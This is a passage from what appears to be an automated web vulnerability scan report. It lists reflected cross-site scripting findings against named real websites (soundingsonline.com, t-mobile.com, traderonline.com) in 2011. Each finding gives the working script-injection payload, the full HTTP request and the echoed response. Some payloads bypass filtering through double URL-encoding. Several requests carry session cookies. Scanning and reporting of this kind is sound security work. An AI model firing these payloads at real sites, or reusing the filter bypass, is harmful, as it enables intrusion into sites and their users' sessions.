This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /resources?9db0b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e03dbd69e9aa=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:39:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:39:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/resources?9db0b"><script>alert(1)</script>03dbd69e9aa=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1442. http://www.soundingsonline.com/site-map [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/site-map

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1055c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7769fd725aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1055c"><script>alert(1)</script>7769fd725aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /site-map?1055c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7769fd725aa=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:39:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:39:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/site-map?1055c"><script>alert(1)</script>7769fd725aa=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1443. http://www.soundingsonline.com/subscription-services/preview-current-issue [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/subscription-services/preview-current-issue

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eeb93%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6761baa2a47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eeb93"><script>alert(1)</script>6761baa2a47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /subscription-services/preview-current-issue?eeb93%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6761baa2a47=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/subscription-services/preview-current-issue?eeb93"><script>alert(1)</script>6761baa2a47=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1444. http://www.t-mobile.com/Company/Community.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.t-mobile.com
Path:	/Company/Community.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2daf"style%3d"x%3aexpression(alert(1))"008dbd21a92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b2daf"style="x:expression(alert(1))"008dbd21a92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Company/Community.aspx?b2daf"style%3d"x%3aexpression(alert(1))"008dbd21a92=1 HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

4.1445. http://www.traderonline.com/about/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/about/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9fd2b<script>alert(1)</script>660c9db3cc8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about9fd2b<script>alert(1)</script>660c9db3cc8/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:31 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27585

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/about9fd2b<script>alert(1)</script>660c9db3cc8/</span>
...[SNIP]...

4.1446. http://www.traderonline.com/about/feedback/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/about/feedback/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 21819<script>alert(1)</script>5aa6dc8921c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about21819<script>alert(1)</script>5aa6dc8921c/feedback/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:42 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27594

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/about21819<script>alert(1)</script>5aa6dc8921c/feedback/</span>
...[SNIP]...

4.1447. http://www.traderonline.com/about/feedback/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/about/feedback/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e07a2<script>alert(1)</script>81ab1500d55 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/feedbacke07a2<script>alert(1)</script>81ab1500d55/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:46 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27594

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/about/feedbacke07a2<script>alert(1)</script>81ab1500d55/</span>
...[SNIP]...

4.1448. http://www.traderonline.com/about/feedback/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/about/feedback/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 797b8"%3balert(1)//59346c5fa60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 797b8";alert(1)//59346c5fa60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /about/feedback/?797b8"%3balert(1)//59346c5fa60=1 HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:10:30 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 35390

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Contact Us at TraderOnline.com</title>
<meta name="description" content="Trader Online is the leader in online
...[SNIP]...
<SCRIPT>DisplayAds("traderonline","www.traderonline.com/", "", "", "?797b8";alert(1)//59346c5fa60=1&","Right1","0","0")</SCRIPT>
...[SNIP]...

4.1449. http://www.traderonline.com/about/magazines/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/about/magazines/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d1abb<script>alert(1)</script>dc321d330e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutd1abb<script>alert(1)</script>dc321d330e0/magazines/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:41 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27595

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/aboutd1abb<script>alert(1)</script>dc321d330e0/magazines/</span>
...[SNIP]...

4.1450. http://www.traderonline.com/about/magazines/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/about/magazines/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d384f<script>alert(1)</script>49cad96841d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/magazinesd384f<script>alert(1)</script>49cad96841d/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:45 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27595

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/about/magazinesd384f<script>alert(1)</script>49cad96841d/</span>
...[SNIP]...

4.1451. http://www.traderonline.com/about/newsletter/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/about/newsletter/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f6d9e<script>alert(1)</script>5fa6a98e11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutf6d9e<script>alert(1)</script>5fa6a98e11/newsletter/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:40 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27595

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/aboutf6d9e<script>alert(1)</script>5fa6a98e11/newsletter/</span>
...[SNIP]...

4.1452. http://www.traderonline.com/about/newsletter/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/about/newsletter/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4fc07<script>alert(1)</script>39f52bc21e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/newsletter4fc07<script>alert(1)</script>39f52bc21e9/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:44 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27596

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/about/newsletter4fc07<script>alert(1)</script>39f52bc21e9/</span>
...[SNIP]...

4.1453. http://www.traderonline.com/advertise/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/advertise/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a58dd<script>alert(1)</script>ec8df3e0846 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /advertisea58dd<script>alert(1)</script>ec8df3e0846/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:09 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27589

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/advertisea58dd<script>alert(1)</script>ec8df3e0846/</span>
...[SNIP]...

4.1454. http://www.traderonline.com/advertiser-agreement/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/advertiser-agreement/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8691b<script>alert(1)</script>65be1beee20 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /advertiser-agreement8691b<script>alert(1)</script>65be1beee20/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:58 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/advertiser-agreement8691b<script>alert(1)</script>65be1beee20/</span>
...[SNIP]...

4.1455. http://www.traderonline.com/advertiser-agreement/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/advertiser-agreement/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5579"%3balert(1)//18aae412f91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5579";alert(1)//18aae412f91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /advertiser-agreement/?e5579"%3balert(1)//18aae412f91=1 HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:10:48 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27015

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>TraderOnline.com Advertiser Agreement</title>
<meta name="description" content="View the Advertiser Agreement fo
...[SNIP]...
